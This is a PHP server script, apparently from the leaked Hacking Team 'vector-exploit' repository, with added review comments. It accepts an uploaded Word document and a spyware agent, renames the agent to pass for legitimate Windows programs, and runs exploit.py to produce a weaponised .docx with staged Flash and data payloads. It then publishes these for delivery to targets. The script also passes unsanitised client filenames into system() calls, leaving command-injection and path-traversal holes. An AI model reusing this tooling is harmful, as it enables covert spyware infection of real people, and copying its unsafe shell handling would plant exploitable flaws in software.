hackedteam/vector-exploit

src/exploit_vps/html/admin/upload.php

<?php
// Purge build artefacts from a previous run before this upload is processed.
// NOTE(review): these shell commands run unconditionally, with the web server
// process's privileges, on every request to this script; the same set is
// repeated again at the end of the file.
system("rm -rf /var/www/html/admin/2013-002-Word/tmp/*");
system("rm -f /var/www/html/admin/2013-002-Word/*swf");
system("rm -f /var/www/html/admin/2013-002-Word/*exe");
system("rm -f /var/www/html/admin/2013-002-Word/*dat");
system("rm -f /var/www/html/admin/2013-002-Word/*docx");
system("rm -f /var/www/html/admin/2013-002-Word/*zip");

// Lookup table used by getScoutName(): each key is a byte pattern searched for
// inside the uploaded agent file (ASCII characters interleaved with NUL bytes,
// i.e. the UTF-16LE spelling of the name), each value is the file name returned
// when that pattern is found. Iteration order decides which match wins.
$scout_names = 
array(

    "C\x00a\x00t\x00a\x00l\x00y\x00s\x00" => "CCC.exe",
    "P\x00o\x00w\x00e\x00r\x00D\x00V\x00D\x00" => "PDVD9Serv.exe",
    "H\x00D\x00 \x00A\x00u\x00d\x00i\x00o\x00" => "RtDCpl.exe",
    "O\x00u\x00t\x00-\x00o\x00f\x00-\x00B\x00r\x00o\x00w\x00s\x00e\x00r\x00" => "sllauncher.exe",
    "L\x00i\x00v\x00e\x00 \x00I\x00D\x00 \x00S\x00e\x00r\x00v\x00i\x00c\x00e\x00" => "WLIDSVCM.exe",
);

function getScoutName($scout_full_path)
{
    // Reads the file at $scout_full_path and returns the value from the global
    // $scout_names map whose key occurs first (in map order) in the file's
    // bytes, or "" when no key occurs. Aborts the request with die() when the
    // "Iaskdj2AS" marker is absent.
    //
    // Both tests rely on strpos() truthiness: an occurrence at byte offset 0
    // counts as "not found", and a failed file_get_contents() (false) is not
    // distinguished from a missing marker.
    global $scout_names;
    $contents = file_get_contents($scout_full_path);
    if (!strpos($contents, "Iaskdj2AS")) {
        die("Bad scout version\n");
    }

    // Keep only the entries whose key is present; map order is preserved, so
    // the first remaining element is the same one the linear scan would hit.
    $found = array_filter(
        $scout_names,
        function ($needle) use ($contents) {
            return (bool) strpos($contents, $needle);
        },
        ARRAY_FILTER_USE_KEY
    );
    if ($found === array()) {
        return "";
    }
    return reset($found);
}

function GeraHash($qtd){
    // Builds a code of $qtd characters drawn from lowercase letters and digits.
    // Returns NULL (not "") when $qtd is below 1, because nothing is appended.
    // NOTE: rand() is not a cryptographically secure source, so the result is
    // predictable and not suitable as a secret or unguessable token.
    $alphabet = 'abcdefghijklmnopqrstuvwxyz0123456789';
    $last_index = strlen($alphabet) - 1;

    $code = NULL;
    $remaining = $qtd;
    while ($remaining >= 1) {
        $code .= $alphabet[rand(0, $last_index)];
        $remaining--;
    }

    return $code;
}

function getName($path, $suffix)
{
    // Returns the first entry of directory $path whose name contains $suffix
    // (strstr() is a substring test, not an "ends with" test, and "." / ".."
    // are visited like any other entry), or the sentinel "NAN" when nothing
    // matches. Listing order is whatever readdir() yields. The handle is never
    // explicitly closed.
    $dir_handle = opendir($path);
    for (;;) {
        $entry = readdir($dir_handle);
        // Ends on false (end of listing) or on any falsy name such as "0".
        if (!$entry) {
            break;
        }
        $tail = strstr($entry, $suffix);
        if ($tail) {
            return $entry;
        }
    }
    return "NAN";
}



// Per-request working directory name. NOTE(review): GeraHash() is built on
// rand(), which is not a cryptographically secure generator, so these names
// are predictable rather than secret.
$rand_directory = GeraHash(8);



// The request-validation lines below are commented out, so $_FILES['original'],
// $_FILES['scout'] and $_POST['DEMO'] are read further down without checking
// that they were actually sent.
#if(!isset($_FILES['modified']) || !isset($_FILES['original']) || !isset($_FILES['stage1']) || !isset($_FILES['stage2'])) die('Files not uploaded');
#if(!isset($_POST['directory'])) die('Directory not specified');

// Output tree ../files/<rand>/ and ../files/<rand>/cnt, relative to the
// current working directory at request start.
if(!mkdir('../files/'.$rand_directory)) die('Unable to create directory');
if(!mkdir('../files/'.$rand_directory."/cnt")) die('Unable to create directory');


// Work inside the fixed build directory; the cwd is restored by chdir($cwd)
// below. The move_uploaded_file() return values are not checked, so a missing
// upload is only noticed later when the moved file is read.
$cwd = getcwd();
chdir("/var/www/html/admin/2013-002-Word");
move_uploaded_file($_FILES['original']['tmp_name'], "/var/www/html/admin/2013-002-Word/original.docx");
move_uploaded_file($_FILES['scout']['tmp_name'], "/var/www/html/admin/2013-002-Word/agent.exe");

// URL prefix passed to the build script and echoed back at the end.
// NOTE(review): SERVER_NAME may reflect the request's Host header depending on
// the web server configuration — confirm before trusting it.
$urlbase = 'http://'.$_SERVER['SERVER_NAME'].'/documents/'.$rand_directory.'/';

// DEMO=y selects a fixed name and the demo build script; otherwise the name is
// derived from the uploaded agent via the $scout_names table.
if (isset($_POST['DEMO']) && $_POST['DEMO'] == "y")
{
    $scout_name = "demo.exe";
}
else
{
    $scout_name = getScoutName("/var/www/html/admin/2013-002-Word/agent.exe");
}

if ($scout_name == "")
    die('Unable to get scout name! :(');

// NOTE(review): $_FILES['original']['name'] is the client-supplied file name.
// It is used unsanitised as the copy() destination (no basename(), so path
// separators and ".." segments are honoured) and is interpolated into the zip
// and python26 command lines wrapped only in double quotes, which does not
// neutralise characters such as ", $ or backticks; escapeshellarg() per
// argument would be the usual check. The mkdir() result is not checked.
mkdir("/tmp/$rand_directory");
copy("original.docx", $_FILES['original']['name']);
system("zip /tmp/$rand_directory/original.zip \"".$_FILES['original']['name'] . "\" > /dev/null 2>&1");

// Both branches run the external build script with the same positional
// arguments; only the script name and the trailing DEMO flag differ. Output
// goes to /tmp/py.log and the exit status is not inspected.
if (isset($_POST['DEMO']) && $_POST['DEMO'] == "y")
{
    system("python26 exploit_demo.py payload:http $urlbase sendtotarget.zip original.docx \"".$_FILES['original']['name']."\" agent.exe server.zip \"$scout_name\" DEMO > /tmp/py.log 2>&1");
}
else
{
    system("python26 exploit.py payload:http $urlbase sendtotarget.zip original.docx \"".$_FILES['original']['name']."\" agent.exe server.zip \"$scout_name\" > /tmp/py.log 2>&1");
}
#mkdir("/tmp/$rand_directory");
#copy("original.docx", "\"".$_FILES['original']['name']."\"");
#system("zip /tmp/$rand_directory/original.zip \"".$_FILES['original']['name'] . "\" >/dev/null 2>&1");

// Unpack the build output into the per-request tmp dir; getName() below picks
// individual files out of it by extension.
system("unzip -d /tmp/$rand_directory server.zip >> /tmp/py.log 2>&1");
#system("unzip -d /tmp/$rand_directory sendtotarget.zip >> /tmp/py.log 2>&1");
chdir($cwd);

$directory = '../files/'.$rand_directory;

// Config written next to the generated files as a PHP snippet
// ("$conf = ...;" via var_export), presumably included by the serving side —
// that consumer is not in this file.
$conf = array(
    'modified' => 'cnt/modified.zip',
    'original' => 'cnt/original.zip',
    'browsercheck' => true,
    'content-type' => 'application/msword',
    'hits' => 1,
);

// $target_zip_name is derived from the client-supplied upload name with a
// plain str_replace(), so it carries the same unsanitised path risk as the
// copy() destination above, here as a file_put_contents() write path.
$target_zip_name = str_replace(".docx", ".zip", $_FILES['original']['name']);
file_put_contents("$directory/$target_zip_name", '$conf = '.var_export($conf, true).';');
copy("/var/www/html/admin/2013-002-Word/sendtotarget.zip", "$directory/cnt/modified.zip");
copy("/tmp/$rand_directory/original.zip", "$directory/cnt/original.zip");
#copy("/var/www/html/admin/2013-002-Word/original.docx", "$directory/cnt/original.docx");

$conf = array(
    'modified' => 'cnt/stage1',
    'hits' => 1,
);

// Stage files are located by extension; "NAN" is getName()'s not-found
// sentinel, and the first matching entry in readdir() order is taken.
$stage1_name = getName("/tmp/$rand_directory/", '.swf');
if ($stage1_name == "NAN")
    die("Stage1 blank");

file_put_contents("$directory/".$stage1_name, '$conf = '.var_export($conf, true).';');
copy("/tmp/$rand_directory/$stage1_name", "$directory/cnt/stage1");

$conf = array(
    'modified' => 'cnt/stage2',
    'hits' => 1,
);
$stage2_name = getName("/tmp/$rand_directory/", '.dat');
if ($stage2_name == "NAN")
    die("Stage2 blank");
file_put_contents("$directory/".$stage2_name, '$conf = '.var_export($conf, true).';');
copy("/tmp/$rand_directory/$stage2_name", "$directory/cnt/stage2");

// Response body: the URL of the generated config file.
#echo 'http://'.$_SERVER['SERVER_NAME'].'/documents/'.$rand_directory.'/'.$_FILES['original']['name'];
echo 'http://'.$_SERVER['SERVER_NAME'].'/documents/'.$rand_directory.'/'.$target_zip_name;

// Cleanup: same purge as at the top of the file plus the per-request tmp dir.
// Not reached when any of the die() calls above fires, so partial build
// artefacts stay behind in that case.
system("rm -rf /var/www/html/admin/2013-002-Word/tmp/*");
system("rm -rf /tmp/$rand_directory");
system("rm -f /var/www/html/admin/2013-002-Word/*swf");
system("rm -f /var/www/html/admin/2013-002-Word/*exe");
system("rm -f /var/www/html/admin/2013-002-Word/*dat");
system("rm -f /var/www/html/admin/2013-002-Word/*docx");
system("rm -f /var/www/html/admin/2013-002-Word/*zip");

?>